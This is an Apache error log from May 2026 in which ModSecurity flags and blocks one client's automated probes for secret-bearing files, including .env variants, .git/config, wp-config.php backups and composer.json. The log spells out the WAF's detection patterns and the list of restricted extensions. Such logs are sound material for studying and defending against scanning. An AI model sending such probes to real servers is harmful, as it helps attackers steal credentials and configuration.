[Mon May 11 22:01:49.019660 2026] [security2:error] [pid 1590352:tid 1590400] [client 193.111.117.35:21756] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1ra1q0G_aXAqWauTyOAAAAIg"]
[Mon May 11 22:01:49.019986 2026] [security2:error] [pid 1601130:tid 1601170] [client 193.111.117.35:21760] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rXEgAO_835W6c1mNlQAAAFQ"]
[Mon May 11 22:01:49.020405 2026] [security2:error] [pid 1588898:tid 1588921] [client 193.111.117.35:21770] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1raFW67LJTsgN3jQEVQAAABc"]
[Mon May 11 22:01:49.020973 2026] [security2:error] [pid 1534836:tid 1534881] [client 193.111.117.35:21776] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rdeaRXe5lR8y0ZOs6QAAAUo"]
[Mon May 11 22:01:49.021108 2026] [security2:error] [pid 1534836:tid 1534879] [client 193.111.117.35:21750] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rdeaRXe5lR8y0ZOs6gAAAUg"]
[Mon May 11 22:01:49.042338 2026] [:error] [pid 1588898:tid 1589210] [client 193.111.117.35:21792] File does not exist: /var/www/html/config.inc.php
[Mon May 11 22:01:49.061476 2026] [:error] [pid 1605480:tid 1605545] [client 193.111.117.35:21854] File does not exist: /var/www/html/test.php
[Mon May 11 22:01:49.066245 2026] [security2:error] [pid 1534836:tid 1534887] [client 193.111.117.35:21820] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.prev"] [unique_id "agI1rdeaRXe5lR8y0ZOs6wAAAVA"]
[Mon May 11 22:01:49.066680 2026] [security2:error] [pid 1534836:tid 1534887] [client 193.111.117.35:21820] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.prev"] [unique_id "agI1rdeaRXe5lR8y0ZOs6wAAAVA"]
[Mon May 11 22:01:49.067531 2026] [security2:error] [pid 1534836:tid 1534887] [client 193.111.117.35:21820] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rdeaRXe5lR8y0ZOs6wAAAVA"]
[Mon May 11 22:01:49.097016 2026] [security2:error] [pid 1605480:tid 1605546] [client 193.111.117.35:21884] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.swp"] [unique_id "agI1rR2Cvzd_nyNfUm_2NQAAARg"]
[Mon May 11 22:01:49.097247 2026] [security2:error] [pid 1605480:tid 1605546] [client 193.111.117.35:21884] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.swp"] [unique_id "agI1rR2Cvzd_nyNfUm_2NQAAARg"]
[Mon May 11 22:01:49.097715 2026] [security2:error] [pid 1601130:tid 1601153] [client 193.111.117.35:21878] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.orig"] [unique_id "agI1rXEgAO_835W6c1mNlwAAAEM"]
[Mon May 11 22:01:49.097861 2026] [security2:error] [pid 1605480:tid 1605546] [client 193.111.117.35:21884] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rR2Cvzd_nyNfUm_2NQAAARg"]
[Mon May 11 22:01:49.097942 2026] [security2:error] [pid 1601130:tid 1601153] [client 193.111.117.35:21878] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.orig"] [unique_id "agI1rXEgAO_835W6c1mNlwAAAEM"]
[Mon May 11 22:01:49.098832 2026] [security2:error] [pid 1601130:tid 1601153] [client 193.111.117.35:21878] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rXEgAO_835W6c1mNlwAAAEM"]
[Mon May 11 22:01:49.114374 2026] [security2:error] [pid 1534836:tid 1534889] [client 193.111.117.35:21898] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.save"] [unique_id "agI1rdeaRXe5lR8y0ZOs7AAAAVI"]
[Mon May 11 22:01:49.114684 2026] [security2:error] [pid 1534836:tid 1534889] [client 193.111.117.35:21898] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.save"] [unique_id "agI1rdeaRXe5lR8y0ZOs7AAAAVI"]
[Mon May 11 22:01:49.116045 2026] [security2:error] [pid 1534836:tid 1534889] [client 193.111.117.35:21898] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rdeaRXe5lR8y0ZOs7AAAAVI"]
[Mon May 11 22:01:49.204571 2026] [security2:error] [pid 1590352:tid 1590392] [client 193.111.117.35:22064] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.git/config"] [unique_id "agI1ra1q0G_aXAqWauTyPAAAAIA"]
[Mon May 11 22:01:49.206576 2026] [security2:error] [pid 1590352:tid 1590392] [client 193.111.117.35:22064] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.git/config"] [unique_id "agI1ra1q0G_aXAqWauTyPAAAAIA"]
[Mon May 11 22:01:49.207801 2026] [security2:error] [pid 1590352:tid 1590392] [client 193.111.117.35:22064] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1ra1q0G_aXAqWauTyPAAAAIA"]
[Mon May 11 22:01:49.229205 2026] [security2:error] [pid 1605480:tid 1605524] [client 193.111.117.35:22092] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/wp-config.php~"] [unique_id "agI1rR2Cvzd_nyNfUm_2OAAAAQI"]
[Mon May 11 22:01:49.229435 2026] [security2:error] [pid 1605480:tid 1605524] [client 193.111.117.35:22092] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/wp-config.php~"] [unique_id "agI1rR2Cvzd_nyNfUm_2OAAAAQI"]
[Mon May 11 22:01:49.230087 2026] [security2:error] [pid 1605480:tid 1605524] [client 193.111.117.35:22092] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rR2Cvzd_nyNfUm_2OAAAAQI"]
[Mon May 11 22:01:49.233654 2026] [security2:error] [pid 1601130:tid 1601166] [client 193.111.117.35:22122] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/wp-config.php.bak"] [unique_id "agI1rXEgAO_835W6c1mNmgAAAFA"]
[Mon May 11 22:01:49.233822 2026] [security2:error] [pid 1601130:tid 1601166] [client 193.111.117.35:22122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/wp-config.php.bak"] [unique_id "agI1rXEgAO_835W6c1mNmgAAAFA"]
[Mon May 11 22:01:49.234596 2026] [security2:error] [pid 1601130:tid 1601166] [client 193.111.117.35:22122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rXEgAO_835W6c1mNmgAAAFA"]
[Mon May 11 22:01:49.234403 2026] [security2:error] [pid 1534836:tid 1534890] [client 193.111.117.35:22114] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/wp-config.php"] [unique_id "agI1rdeaRXe5lR8y0ZOs7wAAAVM"]
[Mon May 11 22:01:49.234945 2026] [security2:error] [pid 1534836:tid 1534890] [client 193.111.117.35:22114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/wp-config.php"] [unique_id "agI1rdeaRXe5lR8y0ZOs7wAAAVM"]
[Mon May 11 22:01:49.235740 2026] [security2:error] [pid 1534836:tid 1534890] [client 193.111.117.35:22114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rdeaRXe5lR8y0ZOs7wAAAVM"]
[Mon May 11 22:01:49.254268 2026] [security2:error] [pid 1588898:tid 1588908] [client 193.111.117.35:22136] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/wp-config.php.old"] [unique_id "agI1raFW67LJTsgN3jQEWwAAAAk"]
[Mon May 11 22:01:49.254522 2026] [security2:error] [pid 1588898:tid 1588908] [client 193.111.117.35:22136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/wp-config.php.old"] [unique_id "agI1raFW67LJTsgN3jQEWwAAAAk"]
[Mon May 11 22:01:49.255148 2026] [security2:error] [pid 1588898:tid 1588908] [client 193.111.117.35:22136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1raFW67LJTsgN3jQEWwAAAAk"]
[Mon May 11 22:01:49.261676 2026] [security2:error] [pid 1590352:tid 1590397] [client 193.111.117.35:22162] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "217.113.192.26"] [uri "/wp-config.bak"] [unique_id "agI1ra1q0G_aXAqWauTyPQAAAIU"]
[Mon May 11 22:01:49.261845 2026] [security2:error] [pid 1590352:tid 1590397] [client 193.111.117.35:22162] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /wp-config.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/wp-config.bak"] [unique_id "agI1ra1q0G_aXAqWauTyPQAAAIU"]
[Mon May 11 22:01:49.262031 2026] [security2:error] [pid 1590352:tid 1590397] [client 193.111.117.35:22162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/wp-config.bak"] [unique_id "agI1ra1q0G_aXAqWauTyPQAAAIU"]
[Mon May 11 22:01:49.263610 2026] [security2:error] [pid 1590352:tid 1590397] [client 193.111.117.35:22162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1ra1q0G_aXAqWauTyPQAAAIU"]
[Mon May 11 22:01:49.298057 2026] [:error] [pid 1601130:tid 1601172] [client 193.111.117.35:22180] File does not exist: /var/www/html/configuration.php
[Mon May 11 22:01:49.350440 2026] [:error] [pid 1534836:tid 1534873] [client 193.111.117.35:22194] File does not exist: /var/www/html/config.php
[Mon May 11 22:01:49.371520 2026] [security2:error] [pid 1590352:tid 1590396] [client 193.111.117.35:22232] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/composer.json"] [unique_id "agI1ra1q0G_aXAqWauTyPgAAAIQ"]
[Mon May 11 22:01:49.371743 2026] [security2:error] [pid 1590352:tid 1590396] [client 193.111.117.35:22232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/composer.json"] [unique_id "agI1ra1q0G_aXAqWauTyPgAAAIQ"]
[Mon May 11 22:01:49.372365 2026] [security2:error] [pid 1590352:tid 1590396] [client 193.111.117.35:22232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1ra1q0G_aXAqWauTyPgAAAIQ"]
[Mon May 11 22:01:49.406683 2026] [:error] [pid 1534836:tid 1534875] [client 193.111.117.35:22248] File does not exist: /var/www/html/phpinfo.php
